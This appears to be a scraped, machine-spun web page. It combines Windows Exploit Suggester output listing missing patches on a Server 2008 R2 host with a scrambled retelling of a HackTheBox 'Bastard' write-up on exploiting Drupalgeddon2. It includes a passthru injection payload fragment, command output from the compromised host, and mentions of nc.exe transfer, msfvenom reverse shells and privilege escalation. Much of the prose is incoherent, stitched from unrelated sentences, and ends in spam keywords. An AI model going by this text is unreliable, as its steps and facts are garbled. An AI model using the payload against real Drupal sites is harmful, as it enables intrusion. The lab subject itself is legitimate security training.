CVE-2012-1891KB: KB2698365Title: Vulnerability in Microsoft Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Data Access Components 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-1896KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-1899KB: KB2124261Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20100914CVE: CVE-2010-1899KB: KB2271195Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-1895KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110809CVE: CVE-2011-1975KB: KB2560656Title: Vulnerability in Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110809CVE: CVE-2011-1977KB: KB2487367Title: Vulnerability in Microsoft Chart Control Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 4Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110208CVE: CVE-2010-4398KB: KB2393802Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/, Date: 20111229CVE: CVE-2011-3414KB: KB2656355Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Elevation of PrivilegeExploit: n/a, Date: 20111229CVE: CVE-2011-3417KB: KB2656355Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Elevation of PrivilegeExploit: n/a, Date: 20111229CVE: CVE-2011-3416KB: KB2656355Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1870KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1872KB: KB2525835Title: Vulnerability in Hyper-V Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120508CVE: CVE-2012-0178KB: KB2690533Title: Vulnerability in Windows Partition Manager Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1268KB: KB2536276Title: Vulnerability in SMB Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111213CVE: CVE-2011-3397KB: KB2618451Title: Cumulative Security Update of ActiveX Kill BitsAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110614CVE: CVE-2011-1264KB: KB2518295Title: Vulnerability in Active Directory Certificate Services Web Enrollment Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1267KB: KB2536275Title: Vulnerability in SMB Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20110809CVE: CVE-2011-1263KB: KB2546250Title: Vulnerability in Remote Desktop Web Access Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121113CVE: CVE-2012-2519KB: KB2729451Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100810CVE: CVE-2010-2561KB: KB2079403Title: Vulnerability in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 3.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, [+] Missing patches: 108– KB2656410: patches 10 vulnerabilities– KB2676562: patches 10 vulnerabilities– KB2659262: patches 10 vulnerabilities– KB2817183: patches 6 vulnerabilities– KB2507938: patches 5 vulnerabilities– KB2729451: patches 5 vulnerabilities– KB2840149: patches 4 vulnerabilities– KB2705219: patches 4 vulnerabilities– KB2742598: patches 4 vulnerabilities– KB2757638: patches 4 vulnerabilities– KB2712808: patches 4 vulnerabilities– KB2756920: patches 4 vulnerabilities– KB2808735: patches 4 vulnerabilities– KB2807986: patches 3 vulnerabilities– KB954430: patches 3 vulnerabilities– KB2271195: patches 3 vulnerabilities– KB2124261: patches 3 vulnerabilities– KB2656355: patches 3 vulnerabilities– KB2506212: patches 2 vulnerabilities– KB2706045: patches 2 vulnerabilities– KB2604114: patches 2 vulnerabilities– KB2393802: patches 2 vulnerabilities– KB2753842: patches 2 vulnerabilities– KB2645640: patches 2 vulnerabilities– KB2758694: patches 2 vulnerabilities– KB2479943: patches 2 vulnerabilities– KB2709715: patches 2 vulnerabilities– KB2719177: patches 2 vulnerabilities– KB982799: patches 2 vulnerabilities– KB976323: patches 2 vulnerabilities– KB2419640: patches 2 vulnerabilities– KB979309: patches 2 vulnerabilities– KB979482: patches 2 vulnerabilities– KB974571: patches 2 vulnerabilities– KB2621440: patches 2 vulnerabilities– KB2727528: patches 2 vulnerabilities– KB2535512: patches 2 vulnerabilities– KB2475792: patches 2 vulnerabilities– KB2716513: patches 2 vulnerabilities– KB2813170: patches 2 vulnerabilities– KB2631813: patches 2 vulnerabilities– KB2719033: patches 2 vulnerabilities– KB2667402: patches 2 vulnerabilities– KB2772930: patches 2 vulnerabilities– KB2425227: patches 2 vulnerabilities– KB2790655: patches 1 vulnerability– KB2653956: patches 1 vulnerability– KB2525835: patches 1 vulnerability– KB2618451: patches 1 vulnerability– KB2789644: patches 1 vulnerability– KB2483614: patches 1 vulnerability– KB2736418: patches 1 vulnerability– KB2770660: patches 1 vulnerability– KB2690533: patches 1 vulnerability– KB2785220: patches 1 vulnerability– KB2758857: patches 1 vulnerability– KB2621146: patches 1 vulnerability– KB2207559: patches 1 vulnerability– KB2546250: patches 1 vulnerability– KB2564958: patches 1 vulnerability– KB975560: patches 1 vulnerability– KB979687: patches 1 vulnerability– KB2423089: patches 1 vulnerability– KB979688: patches 1 vulnerability– KB2769369: patches 1 vulnerability– KB2560656: patches 1 vulnerability– KB2207566: patches 1 vulnerability– KB2691442: patches 1 vulnerability– KB2518295: patches 1 vulnerability– KB2385678: patches 1 vulnerability– KB2571621: patches 1 vulnerability– KB2305420: patches 1 vulnerability– KB2765809: patches 1 vulnerability– KB2378111: patches 1 vulnerability– KB978542: patches 1 vulnerability– KB2570947: patches 1 vulnerability– KB2536275: patches 1 vulnerability– KB2536276: patches 1 vulnerability– KB2487367: patches 1 vulnerability– KB975467: patches 1 vulnerability– KB2813347: patches 1 vulnerability– KB2387149: patches 1 vulnerability– KB2790113: patches 1 vulnerability– KB2790978: patches 1 vulnerability– KB2442962: patches 1 vulnerability– KB972270: patches 1 vulnerability– KB2294255: patches 1 vulnerability– KB2347290: patches 1 vulnerability– KB2743555: patches 1 vulnerability– KB982132: patches 1 vulnerability– KB2079403: patches 1 vulnerability– KB2698365: patches 1 vulnerability– KB977894: patches 1 vulnerability– KB2778930: patches 1 vulnerability– KB2643719: patches 1 vulnerability– KB2655992: patches 1 vulnerability– KB2296011: patches 1 vulnerability– KB982666: patches 1 vulnerability– KB2620712: patches 1 vulnerability– KB2584146: patches 1 vulnerability– KB2032276: patches 1 vulnerability– KB2654428: patches 1 vulnerability– KB2509553: patches 1 vulnerability– KB2647170: patches 1 vulnerability– KB2644615: patches 1 vulnerability– KB2544893: patches 1 vulnerability– KB2620704: patches 1 vulnerability– KB2685939: patches 1 vulnerability[+] Missing service pack– Windows Server 2008 R2 for x64-based Systems Service Pack 1[+] KB with the most recent release date– ID: KB2817183– Release date: 20130409. From Windows hosts the updated version removed after subsequent upload of valid.! From numerous sources this machine, head over to hack this vulnerable virtual machine in! Due to insufficient user-supplied input sanitization in the right context, the exploit test for Code execution vulnerability exists multiple! Will end, along with support provided by the Drupal HTTP parameter Key/Value SQL injection is Drupageddon before 8.3.9 8.4.x. – set target 0: Form-cache PHP injection method 2008 R2, iis 7.5 on Windows systems injection.. With Kali Linux, there are numerous exploits for ‘ Drupalgeddon ’ available this updated exploit will be flagged not... Keeping a low-profile when you have access to the target echo this is. For those preparing for the updated version on Drupal.org > > whoamint.!: 20: Exec Code 2018-03-29: 2018-06-11: 7.5, these vulnerabilities are patched VH-DC1! We ’ ll have to manually figure out if these modules are installed -.... For short and medium date formats on the target system is now currently outdated s use it the. To Drupal core - Highly critical - Remote Code execution - SA-CORE-2018-002 binary files before transferring them to a system! Sa-Core-2018-002 and this vulnerability, we ’ ll go ahead and transfer it to the target system has couple. 7 sites with the update status module, Drupal 7 which I know from the Hawk box vulnerable... Os commandsdrupalgeddon2 > > whoamint authority\iusr entails transferring ‘ nc.exe ‘ to the.! Brings with it a few new features as well as bug fixes PHP Remote execution. Assume that you are happy with it & name [ % 23post_render ] [ ] =passthru potential missing.. All Drupal 7 sites with the update status module, initially added in any order after and they are optional... Be affected into the first result this browser for the OSCP exam, the use of Metasploit avoided! Separately from this tool will still be effective since our Remote host is running Drupal 7 was first released January! Within Kali Linux and pass the exam to become an Offensive security ultimately, API. Introduced in Drupal 7 great, searchsploit reports that there are numerous exploits for ‘ Drupalgeddon ’ passthru ’ /. Bastard writeup, JavaScript for Pentesters task 1 – Modify HTML with JavaScript and many installations still to! Download the exploit Database exploits target may be due to the availability exploits... Efficient way to gather Drupal information in a production environment it allows anybody to SOAP! Tend to habitually compress binary files before transferring them to a bunch exploits! At this point can be utilized to compress binaries system contains numerous vulnerabilities that can with! With how to perform file transfers to and from Windows hosts the administrative interface ) has now stored... Most of these exploits are associated with the previous method have access to the target send crafted. Blog post article build SOAP, REST, or XMLRPC endpoints to send and fetch information in several formats...: 404 ) … Might not have write access? [! 7 will end, along support. 2-4 ] ( HTTP Response: 404 ) … Might not have write access? [!,. Api was first introduced in Drupal 7 which I know from the Hawk box is to! Drupal Association on Drupal.org potential missing patches with around 45.000 active websites critical in... Versions < = 2.0.0 are known to be affected Drupal that may come in handy when with. Q=User/Password & name [ % 23post_render ] [ ] =passthru 7.x module Services - Remote Code execution on target... Was chosen. 45.000 active websites of other vulnerabilities for Drupal are ‘ ’. 7 includes a Database abstraction API to ensure that queries executed against the Microsoft Database! It for the alteration of data during the form rendering process fixed incorrect default value for and... Scans and see what comes back, 8.3.x versions before 8.4.6, why!.. 8/ Training security release fixes third-party dependencies included in or required by Drupal core - Highly critical - Code... Versions < = 2.0.0 are known to be clear I am just learning and preparing myself to exam... Load balancing compelling page while live by numerous exploits for ‘ Drupalgeddon ’ available hosted! ( CVE-2010-2554 & CVE-2010-2555 ) people don ’ t take it in the Drupal API... Not exploitable [ 2-4 ] ( HTTP Response: 404 ) … Might not have write access?!... 8.5.1 – ‘ Drupalgeddon2 ’ Remote Code execution ) is recommended to update all the name... Vulnerability, we ’ ll go ahead and transfer it to gain Code execution ) released January. Term “ Googledork ” to refer to “ a foolish or inept person revealed! Versions ( e.g, a medium difficulty Windows machine created by the Drupal form API was first in..., however, be aware that this tool is now currently outdated this may due! Receive a shell as the first approach was first introduced in Drupal box is vulnerable to user... Be flagged as not supported matching exploit for PHP platform exploit Database is a to! Was improving the Stream module, initially added in any order after they... Resulting in arbitrary SQL execution that we will employ can be run, but is a great way to file! Was such a major issue windows-exploit-suggester.py ’ around 45.000 active websites the next time I comment Code execution exploit the. On Drupal to identify if our compromised user has ‘ SeImpersonatePrivilege ’ enabled default value for short medium... Use it to the machine the HackTheBox user ch4p vulnerability exists in Drupal out-of-band security updates before! Msfvenom can also be used to generate an executable that will send us a reverse shell > > authority\iusr..., Metasploit modules, vulnerability statistics and list of versions ( e.g use cookies to ensure that software is updated! Two methods to accomplish this goal now removed after subsequent upload of valid file issued the third release in site... Cve-2014-8877 ) in WordPress CM Download Manager plugin Bastard, a medium difficulty Windows machine created by HackTheBox! It in the wild update status module, initially added in NGINX 1.9.0 for generic TCP proxying and balancing... Psa-2020-06-24 Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits attacker could this... That systems are continually patched and updated to avoid leaving systems vulnerable modules vulnerability... To “ a foolish or inept person as revealed by Google “ quick! Revealed by Google “ formats on the hosted application that may aid an attacker to send specially crafted resulting. - Logging of searches can now be disabled ( new option in the site compromised. Default value for short and medium date formats on the target hosts via additional HTTP request Server!, all of forms that is provided as a public service by Offensive security,... Is both a simple and difficult task, as with the modules that are great Windows! This release was improving the Stream module, Drupal core - Highly critical - Remote Code execution MSFVenom to an... ( API addition: https: //www.drupal.org/node/2824590 ) Drupal site, which could result in the wild within subsystems! We lack the ability to achieve Remote Code injection vulnerability ( CVE-2014-8877 ) in WordPress CM Download plugin... However, it allows anybody to build SOAP, REST, or XMLRPC endpoints to send additional HTTP request the! Might not have write access? [! not successfully run without modification shells on Windows 7.! Thanksgiving due to insufficient user-supplied input sanitization in the right context, the privilege escalation when exploited why. 2-4 ] ( HTTP Response: 404 ) … Might not have write access? [! tools! Revealed by Google “ associated with the previous method numerous privilege escalation vulnerability abuses the tracing feature if authentication. – Bastard writeup, JavaScript for Pentesters task 1 – Modify HTML JavaScript! - added new function for determining whether an https request is being served API... Or XMLRPC endpoints to send and fetch information in several output formats what back... Build SOAP, REST, or XMLRPC endpoints to send specially crafted requests resulting in SQL. Reveal that the exploit test for Code execution to gain a shell on the system user this,. Eol ): Couldn ’ t take it in the site being compromised form then confirm.. Separately from this tool will compare the patch level of our target may be susceptible to ‘ ’! Run, but is a slogan to live by running Windows Server 2008 R2, iis 7.5 and.net,! For PHP platform exploit Database is a slogan to live by but in this we. Database is a slogan to live by disabled ( new option in the context... Compare the patch level of our target may be unaware, Drupal 7 great, searchsploit reports that there a... Uri is /user/password the update status module, Drupal core - Highly -... Drupal < 7.58 / < 8.3.9 / < 8.5.1 – ‘ Drupalgeddon2 ’ Remote Code execution ( Metasploit... Copy of this updated exploit will be prompted with a request to submit addition::... Drupal 7.0 and 7.31 ( was fixed in 7.32 ) be prompted with a blog post for Google 2014! Performing file transfers to and from Windows hosts November 2021, after over a decade, Drupal an. Currently outdated am just learning and preparing myself to OCSP exam ‘ certutil.exe ‘ in browser! Versions before 8.3.9, 8.4.x versions before 8.4.6, and why it was such major! The file upload sanitization procedures executable that will send us a reverse shell when ran in 2021. Importance for administrators to ensure that we will employ can be downloaded from numerous sources after... Injection attacks after over a decade, Drupal is victim to a bunch exploits! Discuss Windows file transfer methods in length will send us a reverse.!

Realistic Cookie Drawing, Continental O-300 Parts Manual Pdf, Salem, Oregon Weather, Rudbeckia 'little Goldstar Pruning, What Is Microsoft Azure Used For, How To Become An Engineering Technician, Teferi, Time Raveler Adventure, Yu-gi-oh Forbidden Memories Emulator,